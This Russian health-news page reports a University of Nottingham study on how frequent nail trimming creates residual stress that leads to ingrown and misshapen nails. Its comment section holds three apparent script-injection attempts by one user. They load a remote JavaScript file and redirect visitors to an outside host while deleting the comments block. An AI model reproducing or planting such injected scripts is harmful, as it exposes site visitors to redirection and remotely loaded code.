Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем больше вы заботитесь ...  >>  Чем больше вы заботитесь о своих ногтях, тем хуже для их красоты!
 
Обратная связь
 

Чем больше вы заботитесь о своих ногтях, тем хуже для их красоты!

Размер шрифта
10 декабря 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Хотите, чтобы ваши ногти всегда выглядели ухоженными? Главное – не переусердствовать! Оказывается, ежедневный маникюр и педикюр могут нанести серьезный вред здоровью ногтей.

Чем больше вы заботитесь о своих ногтях, тем хуже для их красоты!

Ученым из Университета Ноттингема удалось выявить физические законы, которые определяют рост ногтей. Они использовали эти данные, чтобы пролить свет на причины возникновения таких частых проблем как вросшие ногти и различные изменения формы ногтевой пластинки (пинцетные и ложкообразные ногти).

Согласно данным исследования, опубликованного в журнале Physical Biology, частое обрезание ногтей может нарушить баланс их роста, что приводит к возникновению остаточного напряжения, которое проходит через весь ноготь. Это напряжение способствует изменению формы и кривизны ногтя, что, в свою очередь, может привести к более серьезным проблемам.

«Это замечательно, что люди вкладывают столько сил в то, чтобы их ногти хорошо выглядели», – отмечает Сирил Рауч, автор работы. «Однако в процессе изучения литературы, посвященной росту ногтей, я понял, что в современном взгляде на этот вопрос практически отсутствует физико-математический подход. Мы предполагаем, что фанаты маникюра и педикюра, которые подпиливают и подрезают ногти ежедневно, должны выбирать прямые или параболической формы края. В противном случае их действия приведут лишь к увеличению дисбаланса остаточного напряжения, что может привести к серьезным нарушениям состояния ногтей».

В своем исследовании ученые уделили наибольшее внимание проблеме вросших ногтей. Хотя это состояние известно давно и уже очень хорошо изучено, точные причины его до сих пор неизвестны, а стопроцентно эффективный способ лечения отсутствует. При изучении процесса роста ногтей ученые учитывали тот факт, что ноготь прикреплен к своему ложу с помощью тонких микроскопических образований. Эти структуры то теряют связь с ногтевой пластинкой, то снова соединяются с ней, что позволяет ногтю постепенно расти.

Ученые смогли вывести общее уравнение, которое характеризует форму ногтей. Это уравнение показывает, что, когда баланс между ростом ногтя и силой его прикрепления к ложу нарушается (если ноготь растет слишком быстро или, наоборот, медленно, или же меняется количество микроскопических связей), возникает остаточное напряжение, что приводит к изменению формы ногтевой пластинки. Это остаточное напряжение может возникать как в ногтях на руках, так и на ногах; однако чем больше размер ногтя и чем более плоский у него край, тем напряжение больше. Это объясняет, почему вросшие ногти чаще всего формируются именно на больших пальцах ног. Хотя возникновение остаточного напряжения может быть связано с возрастом и изменением обмена веществ (вросшие ногти часто встречаются у детей и беременных женщин), уравнение показывает, что неправильная обработка ногтей также приводит к увеличению этого напряжения.

Рауч считает, что его работа может быть использована и при изучении проблем с копытами у домашнего скота. Такие проблемы у животных могут быть опасными для жизни. «Крупный рогатый скот, овцы, лошади, пони – все они страдают от подобных нарушений. Так что понимание физики роста и формирования копыт очень важно для нормального развития сельского хозяйства. Я считаю, что подобный научный подход необходим в современной ветеринарной медицине. Наши разработки в области физики могут помочь предотвратить развитие некоторых серьезных заболеваний и устранить их причину», – добавляет Рауч.

В любом деле важно знать меру, так что постарайтесь не слишком увлекаться, заботясь о красоте своих ногтей.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Violensa

19 декабря 2014 в 13:21

Комментарий удален за нарушение Правил общения

2 - Pety1236

21 декабря 2014 в 15:22

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 18:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:24

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Педикюра не бывает много! Как делать правильно?   Может ли обычный маникюр вызвать рак?   Проблемы с красотой после 40, о которых никто вам не рассказывал   Как казаться красивее?  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что можно сказать о женщине по ее ногтям?
Почему ваши ногти все время ломаются?
Необычное использование лака для ногтей

Тесты

1
Как быстро вы стареете
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.